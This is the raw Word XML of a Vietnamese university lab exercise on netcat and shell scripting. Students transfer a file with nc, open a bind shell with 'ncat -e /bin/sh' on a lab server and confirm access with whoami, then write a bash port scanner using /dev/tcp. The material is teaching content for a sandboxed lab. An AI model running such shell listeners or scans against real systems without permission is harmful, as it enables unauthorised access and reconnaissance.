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5DFD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784B8195" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B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Mục đích</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B726B2" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B" w:rsidP="0089393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hiểu về các kỹ thuật tấn công sử dụng một số công cụ như netcat và shell script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24542DFE" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B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4C752D02" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B" w:rsidP="0089393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hệ điều hành Linux, mô hình mạng khách/chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464C875C" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B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00F1A1E7" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B" w:rsidP="0089393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50DCC75A" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B" w:rsidP="0089393B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D89685" w14:textId="77777777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startlab ptit-netcat-shellscript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501354EA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email stu.ptit.edu.vn của mình để nhập thông tin email người thực hiện bài lab khi có yêu cầu, để sử dụng khi chấm điểm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AD84BB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hai terminal ảo sẽ xuất hiện, một cái là đại diện cho máy khách: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, một cái là đại diện cho máy chủ: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server.</w:t>
      </w:r>
      <w:r w:rsidRPr="0089393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Biết rằng 2 máy nằm cùng mạng LAN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC9A6BD" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B" w:rsidP="0089393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 sử dụng lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320E9254" w14:textId="0DE33ACD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echo -n "My string is: $(head -c 20 /dev/urandom | base64)" &gt; sendfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7410691E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 Để tạo 1 file gửi đi có nội dung bất kỳ có 20 ký tự.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349DA47A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89393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 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lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBBAA79" w14:textId="77777777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nc -l -p 12345 &gt; receive.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2087A8BE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Để mở một kết nối netcat lắng nghe (listening) trên cổng 12345</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F615120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Tiếp tục sử dụng Netcat để gửi dữ liệu từ file sendfile.txt tới máy server đang lắng nghe trên cổng 12345 sử dụng lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2371F2C5" w14:textId="77777777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nc &lt;IP máy server&gt; 12345 &lt; sendfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F65C4" w14:textId="315E68B2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Sau đó mở và đọc nội dung file receive.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166FE3C0" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B" w:rsidP="0089393B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3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 khách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 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mở một kết nối Netcat (qua Ncat, một phiên bản mở rộng và an toàn hơn của Netcat) trên cổng 12345 và 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khi có kết nối được thiết lập, nó sẽ thực thi một phiên shell trên máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D810488" w14:textId="77777777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ncat -l -p 12345 -e /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3997AFB2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 mở một kết nối đến một máy chủ tại địa chỉ IP được chỉ định và cổng 12345 bằng cách sử dụng Netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D1C658" w14:textId="6BAE56FE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kết nối được với máy chủ sử dụng lệnh “</w:t>
      </w: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whoami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” và “</w:t>
      </w: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ifconfig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” để chứng minh kết nối thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B307D7" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B" w:rsidP="0089393B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3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 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tạo 1 file chứa các cổng cần đọc trong đó có cổng 22 bằng lệnh touch và nano (ví dụ ports.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C40B632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Tiếp tục trên máy </w:t>
      </w:r>
      <w:r w:rsidRPr="0089393B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</w:t>
      </w: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 tạo một tệp script (ví dụ: scanning.sh) bằng trình soạn thảo văn bản. Trong tệp script sử dụng lệnh để đọc cổng trong file chưa cổng tạo ở trên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499A7601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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ADD609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server_ip="&lt;ip máy server&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F8F0A9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while read port; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4135519F" w14:textId="31B79A7C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(echo &gt; /dev/tcp/$server_ip/$port) 2&gt;/dev/null &amp;&amp; echo "Port $port is open" || echo "Port $port is closed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35890C84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done &lt; ports.txt &gt; result.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B1EFEE" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B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Cấp quyền thực thi và chạy file script, sau đó đọc kết quả nhận được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764E5E57" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B" w:rsidP="0089393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Kết thúc bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37862A7D" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B" w:rsidP="0089393B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lênh sau để kết thúc bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20658B2B" w14:textId="7AA54792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 ptit-netcat-shellscript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7298A43E" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B" w:rsidP="0089393B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64E1E47E" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B" w:rsidP="0089393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lại bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4907AD49" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B" w:rsidP="0089393B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color w:val="1F1F1F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Trong quá trình làm bài sinh viên cần thực hiện lại bài lab, dùng câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468F987E" w14:textId="77777777" w:rsidR="0089393B" w:rsidRPr="0089393B" w:rsidRDefault="0089393B" w:rsidP="008939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9393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 –r ptit-netcat-shellscript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139722EC" w14:textId="77777777" w:rsidR="009029ED" w:rsidRPr="0089393B" w:rsidRDefault="009029ED">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009029ED" w:rsidRPr="0089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5DE4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8282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7874"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9AF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151B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BB4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15C72"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC5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3084"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FD9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118CD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="464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A06DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EA2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F2F19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08F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A"/>
    <w:rsid w:val="0023739A"/>
    <w:rsid w:val="0089393B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D96E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{98086AA6-74EE-43DF-AD81-67116D80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93B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="008939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2025-08-03T14:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-03T14:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>